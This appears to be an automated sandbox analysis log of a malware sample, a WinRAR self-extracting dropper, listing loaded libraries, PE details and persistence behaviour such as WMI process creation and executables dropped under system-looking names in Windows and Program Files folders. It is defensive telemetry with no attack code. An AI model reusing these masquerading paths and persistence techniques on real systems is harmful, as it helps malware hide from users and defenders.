                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: mscoree.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: version.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: uxtheme.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: windows.storage.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wldp.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: profapi.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: cryptsp.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: rsaenh.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: cryptbase.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: sspicli.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: mscoree.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: version.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: uxtheme.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: windows.storage.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wldp.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: profapi.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: cryptsp.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: rsaenh.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: cryptbase.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: version.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: wldp.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: profapi.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: version.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: wldp.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: profapi.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: sspicli.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: mscoree.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: version.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: uxtheme.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: windows.storage.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wldp.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: profapi.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: cryptsp.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: rsaenh.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: cryptbase.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: version.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: wldp.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: profapi.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDirectory created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDirectory created: C:\Program Files\Windows Portable Devices\8e809f57164876Jump to behavior
                                    Source: 544WP3NHaP.exeStatic file information: File size 2235083 > 1048576
                                    Source: 544WP3NHaP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: 544WP3NHaP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: 544WP3NHaP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: 544WP3NHaP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: 544WP3NHaP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: 544WP3NHaP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: 544WP3NHaP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: 544WP3NHaP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 544WP3NHaP.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.pdb source: bridgeportDhcpcommon.exe, 00000005.00000002.1918124129.0000000003C2C000.00000004.00000800.00020000.00000000.sdmp
                                    Source: 544WP3NHaP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: 544WP3NHaP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: 544WP3NHaP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: 544WP3NHaP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: 544WP3NHaP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeFile created: C:\bridgemssurrogateintonet\__tmp_rar_sfx_access_check_7325703Jump to behavior
                                    Source: 544WP3NHaP.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BF640 push ecx; ret 0_2_008BF653
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BEB78 push eax; ret 0_2_008BEB96
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 5_2_00007FFD9BAC47E3 push cs; iretd 5_2_00007FFD9BAC47E9
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 5_2_00007FFD9BEB73A5 push eax; retf 5_2_00007FFD9BEB73AD
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 5_2_00007FFD9BEC09A1 push ecx; iretd 5_2_00007FFD9BEC09A2
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 5_2_00007FFD9BEBEFF2 push esi; ret 5_2_00007FFD9BEBEFF3
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 19_2_00007FFD9BAA47E3 push cs; iretd 19_2_00007FFD9BAA47E9
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 19_2_00007FFD9BAB97ED push 8B48FFFFh; iretd 19_2_00007FFD9BAB97F2
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 19_2_00007FFD9BADDE4A push edx; ret 19_2_00007FFD9BADDE52
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BB0DE4A push edx; ret 21_2_00007FFD9BB0DE52
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BAD47E3 push cs; iretd 21_2_00007FFD9BAD47E9
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BAE97ED push 8B48FFFFh; iretd 21_2_00007FFD9BAE97F2
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BB918A4 push eax; retf 21_2_00007FFD9BB91931
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BEC73A4 push eax; retf 21_2_00007FFD9BEC73AD
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BECB0CB pushfd ; ret 21_2_00007FFD9BECB0D0
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 21_2_00007FFD9BECA492 pushfd ; ret 21_2_00007FFD9BECA4B3
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 37_2_00007FFD9BADDE4A push edx; ret 37_2_00007FFD9BADDE52
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 37_2_00007FFD9BAB97ED push 8B48FFFFh; iretd 37_2_00007FFD9BAB97F2
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 37_2_00007FFD9BAA47E3 push cs; iretd 37_2_00007FFD9BAA47E9
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 38_2_00007FFD9BAD47E3 push cs; iretd 38_2_00007FFD9BAD47E9
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 39_2_00007FFD9BAA47E3 push cs; iretd 39_2_00007FFD9BAA47E9
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 42_2_00007FFD9BAB97ED push 8B48FFFFh; iretd 42_2_00007FFD9BAB97F2
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 42_2_00007FFD9BAA47E3 push cs; iretd 42_2_00007FFD9BAA47E9
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 42_2_00007FFD9BADDE4A push edx; ret 42_2_00007FFD9BADDE52
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeCode function: 43_2_00007FFD9BA947E3 push cs; iretd 43_2_00007FFD9BA947E9
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 45_2_00007FFD9BAC97ED push 8B48FFFFh; iretd 45_2_00007FFD9BAC97F2
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 45_2_00007FFD9BAEDE4A push edx; ret 45_2_00007FFD9BAEDE52
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 45_2_00007FFD9BAB47E3 push cs; iretd 45_2_00007FFD9BAB47E9
                                    Source: bridgeportDhcpcommon.exe.0.drStatic PE information: section name: .text entropy: 7.5423410987344
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe.5.drStatic PE information: section name: .text entropy: 7.5423410987344
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe0.5.drStatic PE information: section name: .text entropy: 7.5423410987344
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe1.5.drStatic PE information: section name: .text entropy: 7.5423410987344
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe2.5.drStatic PE information: section name: .text entropy: 7.5423410987344
                                    Source: SearchApp.exe.5.drStatic PE information: section name: .text entropy: 7.5423410987344

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Drops executables to the windows directory (C:\Windows) and starts them
                                    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJump to dropped file
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile created: C:\Users\user\Desktop\AjJOuhvp.logJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Recovery\SearchApp.exeJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\Desktop\LsbmIiGn.logJump to dropped file
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile created: C:\Users\user\Desktop\KSdeeKAW.logJump to dropped file
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile created: C:\Users\user\Desktop\atZTrSKs.logJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\Desktop\BJIWYGBF.logJump to dropped file
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeFile created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\Desktop\qeNySdhc.logJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\Desktop\sgzhoMlY.logJump to dropped file
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile created: C:\Users\user\Desktop\mEBzyVHW.logJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\Desktop\qeNySdhc.logJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\Desktop\LsbmIiGn.logJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\Desktop\BJIWYGBF.logJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\Desktop\sgzhoMlY.logJump to dropped file
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile created: C:\Users\user\Desktop\mEBzyVHW.logJump to dropped file
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile created: C:\Users\user\Desktop\KSdeeKAW.logJump to dropped file
